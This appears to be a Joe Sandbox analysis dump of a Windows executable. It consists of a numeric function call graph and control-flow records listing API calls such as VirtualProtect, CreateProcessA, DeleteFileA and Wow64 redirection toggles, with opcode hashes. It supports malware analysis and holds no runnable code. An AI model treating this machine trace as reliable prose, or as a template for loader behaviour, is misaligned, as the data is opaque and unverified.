5597 403420 18 API calls 5597->5598 5598->5585 5598->5590 5598->5595 5598->5597 5599 407cb8 35 API calls 5598->5599 5599->5598 5601 40322c 4 API calls 5600->5601 5602 409cab 5601->5602 5603 409cba MessageBoxA 5602->5603 5604 409ccf 5603->5604 5605 403198 4 API calls 5604->5605 5606 409cd7 5605->5606 5606->5468 5608 409af1 5607->5608 5609 409b09 5607->5609 5610 405890 18 API calls 5608->5610 5611 405890 18 API calls 5609->5611 5612 409b03 5610->5612 5613 409b1a 5611->5613 5612->5477 5613->5477 5743 402594 5614->5743 5616 404c2b 5616->5488 5617->5493 5619 405940 19 API calls 5618->5619 5620 405cb9 5619->5620 5621 405280 GetSystemDefaultLCID 5620->5621 5624 4052b6 5621->5624 5622 4031e8 18 API calls 5622->5624 5623 404cdc 19 API calls 5623->5624 5624->5622 5624->5623 5625 40520c 19 API calls 5624->5625 5626 405318 5624->5626 5625->5624 5627 404cdc 19 API calls 5626->5627 5628 40520c 19 API calls 5626->5628 5629 4031e8 18 API calls 5626->5629 5630 40539b 5626->5630 5627->5626 5628->5626 5629->5626 5631 4031b8 4 API calls 5630->5631 5632 4053b5 5631->5632 5633 4053c4 GetSystemDefaultLCID 5632->5633 5690 40520c GetLocaleInfoA 5633->5690 5636 4031e8 18 API calls 5637 405404 5636->5637 5638 40520c 19 API calls 5637->5638 5639 405419 5638->5639 5640 40520c 19 API calls 5639->5640 5641 40543d 5640->5641 5696 405258 GetLocaleInfoA 5641->5696 5644 405258 GetLocaleInfoA 5645 40546d 5644->5645 5646 40520c 19 API calls 5645->5646 5647 405487 5646->5647 5648 405258 GetLocaleInfoA 5647->5648 5649 4054a4 5648->5649 5650 40520c 19 API calls 5649->5650 5651 4054be 5650->5651 5652 4031e8 18 API calls 5651->5652 5653 4054cb 5652->5653 5654 40520c 19 API calls 5653->5654 5655 4054e0 5654->5655 5656 4031e8 18 API calls 5655->5656 5657 4054ed 5656->5657 5658 405258 GetLocaleInfoA 5657->5658 5659 4054fb 5658->5659 5660 40520c 19 API calls 5659->5660 5661 405515 5660->5661 5662 4031e8 18 API calls 5661->5662 5663 405522 5662->5663 5664 40520c 19 API calls 5663->5664 5665 405537 5664->5665 5666 4031e8 18 API calls 5665->5666 5667 405544 5666->5667 5668 40520c 19 API calls 5667->5668 5669 405559 5668->5669 5670 405576 5669->5670 5671 405567 5669->5671 5673 40322c 4 API calls 5670->5673 5698 40322c 5671->5698 5674 405574 5673->5674 5675 40520c 19 API calls 5674->5675 5676 405598 5675->5676 5677 4055b5 5676->5677 5678 4055a6 5676->5678 5679 403198 4 API calls 5677->5679 5680 40322c 4 API calls 5678->5680 5681 4055b3 5679->5681 5680->5681 5682 4033b4 18 API calls 5681->5682 5683 4055d7 5682->5683 5684 4033b4 18 API calls 5683->5684 5685 4055f1 5684->5685 5686 4031b8 4 API calls 5685->5686 5687 40560b 5686->5687 5688 405cf4 GetVersionExA 5687->5688 5689 405d0b 5688->5689 5689->5458 5691 405233 5690->5691 5692 405245 5690->5692 5693 403278 18 API calls 5691->5693 5694 40322c 4 API calls 5692->5694 5695 405243 5693->5695 5694->5695 5695->5636 5697 405274 5696->5697 5697->5644 5700 403230 5698->5700 5699 403252 5699->5674 5700->5699 5701 4025ac 4 API calls 5700->5701 5701->5699 5706 403414 5702->5706 5705 406fee 5705->5518 5707 403418 LoadLibraryA 5706->5707 5707->5705 5709 406af0 18 API calls 5708->5709 5710 406bf3 5709->5710 5711 406c05 5710->5711 5712 406af0 18 API calls 5710->5712 5713 403198 4 API calls 5711->5713 5712->5710 5714 406c1a 5713->5714 5714->5530 5716 407578 5715->5716 5717 4075b7 CreateFileA 5716->5717 5717->5552 5719 403414 5718->5719 5720 4075b7 CreateFileA 5719->5720 5720->5552 5722 407cd3 5721->5722 5724 407cc8 5721->5724 5727 407c5c 5722->5727 5724->5588 5726 405890 18 API calls 5726->5724 5728 407c70 5727->5728 5729 407caf 5727->5729 5728->5729 5731 407bac 5728->5731 5729->5724 5729->5726 5732 407bb7 5731->5732 5736 407bc8 5731->5736 5734 405890 18 API calls 5732->5734 5733 4074a0 34 API calls 5735 407bdc 5733->5735 5734->5736 5737 4074a0 34 API calls 5735->5737 5736->5733 5738 407bfd 5737->5738 5739 407918 InterlockedExchange 5738->5739 5740 407c12 5739->5740 5741 407c28 5740->5741 5742 405890 18 API calls 5740->5742 5741->5728 5742->5741 5744 402598 5743->5744 5746 4025a2 5743->5746 5749 401fd4 5744->5749 5745 40259e 5745->5746 5747 403154 4 API calls 5745->5747 5746->5616 5746->5746 5747->5746 5750 401fe8 5749->5750 5751 401fed 5749->5751 5760 401918 RtlInitializeCriticalSection 5750->5760 5753 402012 RtlEnterCriticalSection 5751->5753 5754 40201c 5751->5754 5759 401ff1 5751->5759 5753->5754 5754->5759 5767 401ee0 5754->5767 5757 402147 5757->5745 5758 40213d RtlLeaveCriticalSection 5758->5757 5759->5745 5761 40193c RtlEnterCriticalSection 5760->5761 5762 401946 5760->5762 5761->5762 5763 401964 LocalAlloc 5762->5763 5764 40197e 5763->5764 5765 4019c3 RtlLeaveCriticalSection 5764->5765 5766 4019cd 5764->5766 5765->5766 5766->5751 5770 401ef0 5767->5770 5768 401f1c 5772 401f40 5768->5772 5778 401d00 5768->5778 5770->5768 5770->5772 5773 401e58 5770->5773 5772->5757 5772->5758 5782 4016d8 5773->5782 5776 401e75 5776->5770 5779 401d4e 5778->5779 5780 401d1e 5778->5780 5779->5780 5851 401c68 5779->5851 5780->5772 5785 4016f4 5782->5785 5784 4016fe 5807 4015c4 5784->5807 5785->5784 5787 40175b 5785->5787 5789 40174f 5785->5789 5799 401430 5785->5799 5811 40132c 5785->5811 5787->5776 5792 401dcc 5787->5792 5815 40150c 5789->5815 5790 40170a 5790->5787 5825 401d80 5792->5825 5795 40132c LocalAlloc 5796 401df0 5795->5796 5798 401df8 5796->5798 5829 401b44 5796->5829 5798->5776 5800 40143f VirtualAlloc 5799->5800 5802 40146c 5800->5802 5803 40148f 5800->5803 5819 4012e4 5802->5819 5803->5785 5806 40147c VirtualFree 5806->5803 5809 40160a 5807->5809 5808 40163a 5808->5790 5809->5808 5810 401626 VirtualAlloc 5809->5810 5810->5808 5810->5809 5812 401348 5811->5812 5813 4012e4 LocalAlloc 5812->5813 5814 40138f 5813->5814 5814->5785 5818 40153b 5815->5818 5816 401594 5816->5787 5817 401568 VirtualFree 5817->5818 5818->5816 5818->5817 5822 40128c 5819->5822 5823 401298 LocalAlloc 5822->5823 5824 4012aa 5822->5824 5823->5824 5824->5803 5824->5806 5826 401d89 5825->5826 5828 401d92 5825->5828 5826->5828 5834 401b74 5826->5834 5828->5795 5830 401b61 5829->5830 5831 401b52 5829->5831 5830->5798 5832 401d00 9 API calls 5831->5832 5833 401b5f 5832->5833 5833->5798 5837 40215c 5834->5837 5836 401b95 5836->5828 5838 40217a 5837->5838 5839 402175 5837->5839 5841 4021ab RtlEnterCriticalSection 5838->5841 5842 40217e 5838->5842 5849 4021b5 5838->5849 5840 401918 4 API calls 5839->5840 5840->5838 5841->5849 5842->5836 5843 4021c1 5845 4022e3 RtlLeaveCriticalSection 5843->5845 5846 4022ed 5843->5846 5844 402244 5844->5842 5847 401d80 7 API calls 5844->5847 5845->5846 5846->5836 5847->5842 5848 402270 5848->5843 5850 401d00 7 API calls 5848->5850 5849->5843 5849->5844 5849->5848 5850->5843 5852 401c7a 5851->5852 5853 401c9d 5852->5853 5854 401caf 5852->5854 5864 40188c 5853->5864 5856 40188c 3 API calls 5854->5856 5857 401cad 5856->5857 5858 401b44 9 API calls 5857->5858 5863 401cc5 5857->5863 5859 401cd4 5858->5859 5860 401cee 5859->5860 5874 401b98 5859->5874 5879 4013a0 5860->5879 5863->5780 5865 4018b2 5864->5865 5873 40190b 5864->5873 5883 401658 5865->5883 5868 40132c LocalAlloc 5869 4018cf 5868->5869 5870 40150c VirtualFree 5869->5870 5871 4018e6 5869->5871 5870->5871 5872 4013a0 LocalAlloc 5871->5872 5871->5873 5872->5873 5873->5857 5875 401bab 5874->5875 5876 401b9d 5874->5876 5875->5860 5877 401b74 9 API calls 5876->5877 5878 401baa 5877->5878 5878->5860 5881 4013ab 5879->5881 5880 4013c6 5880->5863 5881->5880 5882 4012e4 LocalAlloc 5881->5882 5882->5880 5885 40168f 5883->5885 5884 4016cf 5884->5868 5885->5884 5886 4016a9 VirtualFree 5885->5886 5886->5885 6843 402dfa 6844 402e26 6843->6844 6845 402e0d 6843->6845 6847 402ba4 6845->6847 6848 402bc9 6847->6848 6849 402bad 6847->6849 6848->6844 6850 402bb5 RaiseException 6849->6850 6850->6848 6851 4075fa GetFileSize 6852 407626 6851->6852 6853 407616 GetLastError 6851->6853 6853->6852 6854 40761f 6853->6854 6855 40748c 35 API calls 6854->6855 6855->6852 6856 406ffb 6857 407008 SetErrorMode 6856->6857 6525 403a80 CloseHandle 6526 403a90 6525->6526 6527 403a91 GetLastError 6525->6527 6528 404283 6529 4042c3 6528->6529 6530 403154 4 API calls 6529->6530 6531 404323 6530->6531 6858 404185 6859 4041ff 6858->6859 6860 4041cc 6859->6860 6861 403154 4 API calls 6859->6861 6862 404323 6861->6862 6532 403e87 6533 403e4c 6532->6533 6534 403e62 6533->6534 6535 403e7b 6533->6535 6538 403e67 6533->6538 6541 403cc8 6534->6541 6537 402674 4 API calls 6535->6537 6539 403e78 6537->6539 6538->6539 6545 402674 6538->6545 6542 403cd6 6541->6542 6543 402674 4 API calls 6542->6543 6544 403ceb 6542->6544 6543->6544 6544->6538 6546 403154 4 API calls 6545->6546 6547 40267a 6546->6547 6547->6539 6556 407e90 6557 407eb8 VirtualFree 6556->6557 6558 407e9d 6557->6558 6561 403e95 6562 403e4c 6561->6562 6563 403e67 6562->6563 6564 403e62 6562->6564 6565 403e7b 6562->6565 6568 403e78 6563->6568 6569 402674 4 API calls 6563->6569 6566 403cc8 4 API calls 6564->6566 6567 402674 4 API calls 6565->6567 6566->6563 6567->6568 6569->6568 6570 40ac97 6579 4096fc 6570->6579 6573 402f24 5 API calls 6574 40aca1 6573->6574 6575 403198 4 API calls 6574->6575 6576 40acc0 6575->6576 6577 403198 4 API calls 6576->6577 6578 40acc8 6577->6578 6588 4056ac 6579->6588 6581 409717 6582 409745 6581->6582 6594 40720c 6581->6594 6585 403198 4 API calls 6582->6585 6584 409735 6587 40973d MessageBoxA 6584->6587 6586 40975a 6585->6586 6586->6573 6586->6574 6587->6582 6589 403154 4 API calls 6588->6589 6590 4056b1 6589->6590 6591 4056c9 6590->6591 6592 403154 4 API calls 6590->6592 6591->6581 6593 4056bf 6592->6593 6593->6581 6595 4056ac 4 API calls 6594->6595 6596 40721b 6595->6596 6597 407221 6596->6597 6598 40722f 6596->6598 6599 40322c 4 API calls 6597->6599 6600 40724b 6598->6600 6601 40723f 6598->6601 6603 40722d 6599->6603 6612 4032b8 6600->6612 6605 4071d0 6601->6605 6603->6584 6606 40322c 4 API calls 6605->6606 6607 4071df 6606->6607 6608 4071fc 6607->6608 6609 406950 CharPrevA 6607->6609 6608->6603 6610 4071eb 6609->6610 6610->6608 6611 4032fc 18 API calls 6610->6611 6611->6608 6613 403278 18 API calls 6612->6613 6614 4032c2 6613->6614 6614->6603 6615 403a97 6616 403aac 6615->6616 6617 403bbc GetStdHandle 6616->6617 6618 403b0e CreateFileA 6616->6618 6626 403ab2 6616->6626 6619 403c17 GetLastError 6617->6619 6632 403bba 6617->6632 6618->6619 6620 403b2c 6618->6620 6619->6626 6622 403b3b GetFileSize 6620->6622 6620->6632 6622->6619 6623 403b4e SetFilePointer 6622->6623 6623->6619 6628 403b6a ReadFile 6623->6628 6624 403be7 GetFileType 6625 403c02 CloseHandle 6624->6625 6624->6626 6625->6626 6628->6619 6629 403b8c 6628->6629 6630 403b9f SetFilePointer 6629->6630 6629->6632 6630->6619 6631 403bb0 SetEndOfFile 6630->6631 6631->6619 6631->6632 6632->6624 6632->6626 6637 40aaa2 6638 40aad2 6637->6638 6639 40aadc CreateWindowExA SetWindowLongA 6638->6639 6640 405194 33 API calls 6639->6640 6641 40ab5f 6640->6641 6642 4032fc 18 API calls 6641->6642 6643 40ab6d 6642->6643 6644 4032fc 18 API calls 6643->6644 6645 40ab7a 6644->6645 6646 406b7c 19 API calls 6645->6646 6647 40ab86 6646->6647 6648 4032fc 18 API calls 6647->6648 6649 40ab8f 6648->6649 6650 4099ec 43 API calls 6649->6650 6651 40aba1 6650->6651 6652 4098cc 19 API calls 6651->6652 6653 40abb4 6651->6653 6652->6653 6654 40abed 6653->6654 6655 4094d8 9 API calls 6653->6655 6656 40ac06 6654->6656 6659 40ac00 RemoveDirectoryA 6654->6659 6655->6654 6657 40ac1a 6656->6657 6658 40ac0f DestroyWindow 6656->6658 6660 40ac42 6657->6660 6661 40357c 4 API calls 6657->6661 6658->6657 6659->6656 6662 40ac38 6661->6662 6663 4025ac 4 API calls 6662->6663 6663->6660 6875 405ba2 6877 405ba4 6875->6877 6876 405be0 6880 405940 19 API calls 6876->6880 6877->6876 6878 405bf7 6877->6878 6879 405bda 6877->6879 6884 404cdc 19 API calls 6878->6884 6879->6876 6881 405c4c 6879->6881 6882 405bf3 6880->6882 6883 4059b0 33 API calls 6881->6883 6885 403198 4 API calls 6882->6885 6883->6882 6886 405c20 6884->6886 6887 405c86 6885->6887 6888 4059b0 33 API calls 6886->6888 6888->6882 6889 408da4 6890 408dc8 6889->6890 6891 408c80 18 API calls 6890->6891 6892 408dd1 6891->6892 6664 402caa 6665 403154 4 API calls 6664->6665 6666 402caf 6665->6666 6907 4011aa 6908 4011ac GetStdHandle 6907->6908 6667 4028ac 6668 402594 18 API calls 6667->6668 6669 4028b6 6668->6669 4979 40aab4 4980 40aab8 SetLastError 4979->4980 5011 409648 GetLastError 4980->5011 4983 40aad2 4985 40aadc CreateWindowExA SetWindowLongA 4983->4985 5024 405194 4985->5024 4989 40ab6d 4990 4032fc 18 API calls 4989->4990 4991 40ab7a 4990->4991 5041 406b7c GetCommandLineA 4991->5041 4994 4032fc 18 API calls 4995 40ab8f 4994->4995 5046 4099ec 4995->5046 4997 40aba1 4999 40abb4 4997->4999 5067 4098cc 4997->5067 5000 40abd4 4999->5000 5001 40abed 4999->5001 5073 4094d8 5000->5073 5003 40ac06 5001->5003 5006 40ac00 RemoveDirectoryA 5001->5006 5004 40ac1a 5003->5004 5005 40ac0f DestroyWindow 5003->5005 5007 40ac42 5004->5007 5081 40357c 5004->5081 5005->5004 5006->5003 5009 40ac38 5094 4025ac 5009->5094 5098 404c94 5011->5098 5019 4096c3 5113 4031b8 5019->5113 5025 4051a8 33 API calls 5024->5025 5026 4051a3 5025->5026 5027 4032fc 5026->5027 5028 403300 5027->5028 5029 40333f 5027->5029 5030 4031e8 5028->5030 5031 40330a 5028->5031 5029->4989 5037 403254 18 API calls 5030->5037 5038 4031fc 5030->5038 5032 403334 5031->5032 5033 40331d 5031->5033 5034 4034f0 18 API calls 5032->5034 5274 4034f0 5033->5274 5040 403322 5034->5040 5035 403228 5035->4989 5037->5038 5038->5035 5039 4025ac 4 API calls 5038->5039 5039->5035 5040->4989 5300 406af0 5041->5300 5043 406ba1 5044 403198 4 API calls 5043->5044 5045 406bbf 5044->5045 5045->4994 5314 4033b4 5046->5314 5048 409a27 5049 409a59 CreateProcessA 5048->5049 5050 409a65 5049->5050 5051 409a6c CloseHandle 5049->5051 5052 409648 35 API calls 5050->5052 5053 409a75 5051->5053 5052->5051 5054 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5053->5054 5055 409a7a MsgWaitForMultipleObjects 5054->5055 5055->5053 5056 409a91 5055->5056 5057 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5056->5057 5058 409a96 GetExitCodeProcess CloseHandle 5057->5058 5059 409ab6 5058->5059 5060 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5059->5060 5061 409abe 5060->5061 5061->4997 5062 402f24 5063 403154 4 API calls 5062->5063 5064 402f29 5063->5064 5320 402bcc 5064->5320 5066 402f51 5066->5066 5068 40990e 5067->5068 5069 4098d4 5067->5069 5068->4999 5069->5068 5070 403420 18 API calls 5069->5070 5071 409908 5070->5071 5323 408e80 5071->5323 5074 409532 5073->5074 5078 4094eb 5073->5078 5074->5001 5075 4094f3 Sleep 5075->5078 5076 409503 Sleep 5076->5078 5078->5074 5078->5075 5078->5076 5079 40951a GetLastError 5078->5079 5346 408fbc 5078->5346 5079->5074 5080 409524 GetLastError 5079->5080 5080->5074 5080->5078 5084 403591 5081->5084 5090 4035a0 5081->5090 5082 4035b1 5085 403198 4 API calls 5082->5085 5083 4035b8 5086 4031b8 4 API calls 5083->5086 5087 4035d0 5084->5087 5088 40359b 5084->5088 5089 4035b6 5084->5089 5085->5089 5086->5089 5087->5089 5092 40357c 4 API calls 5087->5092 5088->5090 5091 4035ec 5088->5091 5089->5009 5090->5082 5090->5083 5091->5089 5363 403554 5091->5363 5092->5087 5095 4025b0 5094->5095 5096 4025ba 5094->5096 5095->5096 5097 403154 4 API calls 5095->5097 5096->5007 5096->5096 5097->5096 5121 4051a8 5098->5121 5101 407284 FormatMessageA 5102 4072aa 5101->5102 5103 403278 18 API calls 5102->5103 5104 4072c7 5103->5104 5105 408da8 5104->5105 5106 408dc8 5105->5106 5264 408c80 5106->5264 5109 405890 5110 405897 5109->5110 5111 4031e8 18 API calls 5110->5111 5112 4058af 5111->5112 5112->5019 5115 4031be 5113->5115 5114 4031e3 5117 403198 5114->5117 5115->5114 5116 4025ac 4 API calls 5115->5116 5116->5115 5118 4031b7 5117->5118 5119 40319e 5117->5119 5118->4983 5118->5062 5119->5118 5120 4025ac 4 API calls 5119->5120 5120->5118 5122 4051c5 5121->5122 5129 404e58 5122->5129 5125 4051f1 5134 403278 5125->5134 5132 404e73 5129->5132 5130 404e85 5130->5125 5139 404be4 5130->5139 5132->5130 5142 404f7a 5132->5142 5149 404e4c 5132->5149 5135 403254 18 API calls 5134->5135 5136 403288 5135->5136 5137 403198 4 API calls 5136->5137 5138 4032a0 5137->5138 5138->5101 5256 405940 5139->5256 5141 404bf5 5141->5125 5143 404f8b 5142->5143 5147 404fd9 5142->5147 5146 40505f 5143->5146 5143->5147 5145 404ff7 5145->5132 5146->5145 5156 404e38 5146->5156 5147->5145 5152 404df4 5147->5152 5150 403198 4 API calls 5149->5150 5151 404e56 5150->5151 5151->5132 5153 404e02 5152->5153 5159 404bfc 5153->5159 5155 404e30 5155->5147 5186 4039a4 5156->5186 5162 4059b0 5159->5162 5161 404c15 5161->5155 5163 4059be 5162->5163 5172 404cdc LoadStringA 5163->5172 5166 405194 33 API calls 5167 4059f6 5166->5167 5175 4031e8 5167->5175 5170 4031b8 4 API calls 5171 405a1b 5170->5171 5171->5161 5173 403278 18 API calls 5172->5173 5174 404d09 5173->5174 5174->5166 5176 4031ec 5175->5176 5179 4031fc 5175->5179 5176->5179 5181 403254 5176->5181 5177 403228 5177->5170 5179->5177 5180 4025ac 4 API calls 5179->5180 5180->5177 5182 403274 5181->5182 5183 403258 5181->5183 5182->5179 5184 402594 18 API calls 5183->5184 5185 403261 5184->5185 5185->5179 5187 4039ab 5186->5187 5192 4038b4 5187->5192 5189 4039cb 5190 403198 4 API calls 5189->5190 5191 4039d2 5190->5191 5191->5145 5193 4038d5 5192->5193 5194 4038c8 5192->5194 5196 403934 5193->5196 5197 4038db 5193->5197 5220 403780 5194->5220 5198 403993 5196->5198 5199 40393b 5196->5199 5200 4038e1 5197->5200 5201 4038ee 5197->5201 5202 4037f4 3 API calls 5198->5202 5203 403941 5199->5203 5204 40394b 5199->5204 5227 403894 5200->5227 5206 403894 6 API calls 5201->5206 5209 4038d0 5202->5209 5242 403864 5203->5242 5208 4037f4 3 API calls 5204->5208 5210 4038fc 5206->5210 5211 40395d 5208->5211 5209->5189 5232 4037f4 5210->5232 5214 403864 23 API calls 5211->5214 5213 403917 5238 40374c 5213->5238 5215 403976 5214->5215 5218 40374c VariantClear 5215->5218 5217 40392c 5217->5189 5219 40398b 5218->5219 5219->5189 5221 4037f0 5220->5221 5223 403744 5220->5223 5221->5209 5222 403793 VariantClear 5222->5223 5223->5220 5223->5222 5224 4037ab 5223->5224 5225 403198 4 API calls 5223->5225 5226 4037dc VariantCopyInd 5223->5226 5224->5209 5225->5223 5226->5221 5226->5223 5247 4036b8 5227->5247 5230 40374c VariantClear 5231 4038a9 5230->5231 5231->5209 5233 403845 VariantChangeTypeEx 5232->5233 5234 40380a VariantChangeTypeEx 5232->5234 5237 403832 5233->5237 5235 403826 5234->5235 5236 40374c VariantClear 5235->5236 5236->5237 5237->5213 5239 403759 5238->5239 5240 403766 5238->5240 5239->5240 5241 403779 VariantClear 5239->5241 5240->5217 5241->5217 5253 40369c SysStringLen 5242->5253 5245 40374c VariantClear 5246 403882 5245->5246 5246->5209 5248 4036cb 5247->5248 5249 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5248->5249 5250 4036db 5248->5250 5251 40372e 5249->5251 5252 4036ed MultiByteToWideChar SysAllocStringLen 5250->5252 5251->5230 5252->5251 5254 403610 21 API calls 5253->5254 5255 4036b3 5254->5255 5255->5245 5257 40594c 5256->5257 5258 404cdc 19 API calls 5257->5258 5259 405972 5258->5259 5260 4031e8 18 API calls 5259->5260 5261 40597d 5260->5261 5262 403198 4 API calls 5261->5262 5263 405992 5262->5263 5263->5141 5265 403198 4 API calls 5264->5265 5267 408cb1 5264->5267 5265->5267 5266 4031b8 4 API calls 5268 408d69 5266->5268 5269 408cc8 5267->5269 5270 403278 18 API calls 5267->5270 5272 408cdc 5267->5272 5273 4032fc 18 API calls 5267->5273 5268->5109 5271 4032fc 18 API calls 5269->5271 5270->5267 5271->5272 5272->5266 5273->5267 5275 4034fd 5274->5275 5282 40352d 5274->5282 5277 403526 5275->5277 5280 403509 5275->5280 5276 403198 4 API calls 5279 403517 5276->5279 5278 403254 18 API calls 5277->5278 5278->5282 5279->5040 5283 4025c4 5280->5283 5282->5276 5285 4025ca 5283->5285 5284 4025dc 5284->5279 5284->5284 5285->5284 5287 403154 5285->5287 5288 403164 5287->5288 5289 40318c TlsGetValue 5287->5289 5288->5284 5290 403196 5289->5290 5291 40316f 5289->5291 5290->5284 5295 40310c 5291->5295 5293 403174 TlsGetValue 5294 403184 5293->5294 5294->5284 5296 403120 LocalAlloc 5295->5296 5297 403116 5295->5297 5298 40313e TlsSetValue 5296->5298 5299 403132 5296->5299 5297->5296 5298->5299 5299->5293 5301 406b1c 5300->5301 5302 403278 18 API calls 5301->5302 5303 406b29 5302->5303 5310 403420 5303->5310 5305 406b31 5306 4031e8 18 API calls 5305->5306 5307 406b49 5306->5307 5308 403198 4 API calls 5307->5308 5309 406b6b 5308->5309 5309->5043 5311 403426 5310->5311 5313 403437 5310->5313 5312 403254 18 API calls 5311->5312 5311->5313 5312->5313 5313->5305 5315 4033bc 5314->5315 5316 403254 18 API calls 5315->5316 5317 4033cf 5316->5317 5318 4031e8 18 API calls 5317->5318 5319 4033f7 5318->5319 5321 402bd5 RaiseException 5320->5321 5322 402be6 5320->5322 5321->5322 5322->5066 5324 408e8e 5323->5324 5326 408ea6 5324->5326 5336 408e18 5324->5336 5327 408e18 18 API calls 5326->5327 5328 408eca 5326->5328 5327->5328 5339 407918 5328->5339 5330 408ee5 5331 408e18 18 API calls 5330->5331 5333 408ef8 5330->5333 5331->5333 5332 408e18 18 API calls 5332->5333 5333->5332 5334 403278 18 API calls 5333->5334 5335 408f27 5333->5335 5334->5333 5335->5068 5337 405890 18 API calls 5336->5337 5338 408e29 5337->5338 5338->5326 5342 4078c4 5339->5342 5343 4078d6 5342->5343 5344 4078e7 5342->5344 5345 4078db InterlockedExchange 5343->5345 5344->5330 5345->5344 5354 408f70 5346->5354 5348 408fd2 5349 408fd6 5348->5349 5350 408ff2 DeleteFileA GetLastError 5348->5350 5349->5078 5351 409010 5350->5351 5360 408fac 5351->5360 5355 408f7a 5354->5355 5356 408f7e 5354->5356 5355->5348 5357 408fa0 SetLastError 5356->5357 5358 408f87 Wow64DisableWow64FsRedirection 5356->5358 5359 408f9b 5357->5359 5358->5359 5359->5348 5361 408fb1 Wow64RevertWow64FsRedirection 5360->5361 5362 408fbb 5360->5362 5361->5362 5362->5078 5364 403566 5363->5364 5366 403578 5364->5366 5367 403604 5364->5367 5366->5091 5368 40357c 5367->5368 5373 40359b 5368->5373 5374 4035d0 5368->5374 5375 4035a0 5368->5375 5379 4035b6 5368->5379 5369 4035b1 5371 403198 4 API calls 5369->5371 5370 4035b8 5372 4031b8 4 API calls 5370->5372 5371->5379 5372->5379 5373->5375 5376 4035ec 5373->5376 5377 40357c 4 API calls 5374->5377 5374->5379 5375->5369 5375->5370 5378 403554 4 API calls 5376->5378 5376->5379 5377->5374 5378->5376 5379->5364 6670 401ab9 6671 401a96 6670->6671 6672 401aa9 RtlDeleteCriticalSection 6671->6672 6673 401a9f RtlLeaveCriticalSection 6671->6673 6673->6672

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 134 409bfb-409c08 VirtualProtect 132->134 134->121
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 2441996862-0
                                                                                • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
